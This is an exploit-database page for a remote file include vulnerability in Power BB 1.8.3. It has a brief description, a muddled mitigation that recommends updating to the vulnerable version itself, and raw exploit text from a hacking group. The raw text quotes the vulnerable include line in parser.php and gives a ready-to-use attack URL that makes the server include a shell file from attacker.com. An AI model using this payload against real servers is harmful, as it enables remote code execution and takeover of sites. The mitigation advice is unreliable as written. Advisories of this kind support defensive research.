header-logo
Suggest Exploit
vendor:
Power BB
by:
DigitALL

Power BB 1.8.3 Remote File Include

Power BB 1.8.3 is vulnerable to a remote file include vulnerability due to the use of the $_SERVER['DOCUMENT_ROOT'] variable in the include statement. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable server. The malicious URL contains the path to the attacker's malicious file, which is then included in the vulnerable application. This can lead to remote code execution on the vulnerable server.

Mitigation:

To mitigate this vulnerability, the application should be updated to the latest version of Power BB 1.8.3. Additionally, the application should be configured to use a whitelist of allowed files and directories.
Source

Exploit-DB raw data:

## Dada?lar Grup Komutanl??? ##

## | HackSpy | Zombie | KroNickq | DigitALL | NoFearx38 | ##

## 1923Turk Grup ##

## by DigitALL ##

## Sites : http://powerwd.net ##

## Download : http://www.phpexplorer.com/Goster/536 ##

## Download : http://sourceforge.net/projects/pbb/ ##

## Power BB 1.8.3 Remote File ?ncludes ##

## /include/parser.php

## @include($_SERVER['DOCUMENT_ROOT'].$include);

## http://server/[path]/include/parser.php?_SERVER[DOCUMENT_ROOT]=http://attacker.com/shell.txt?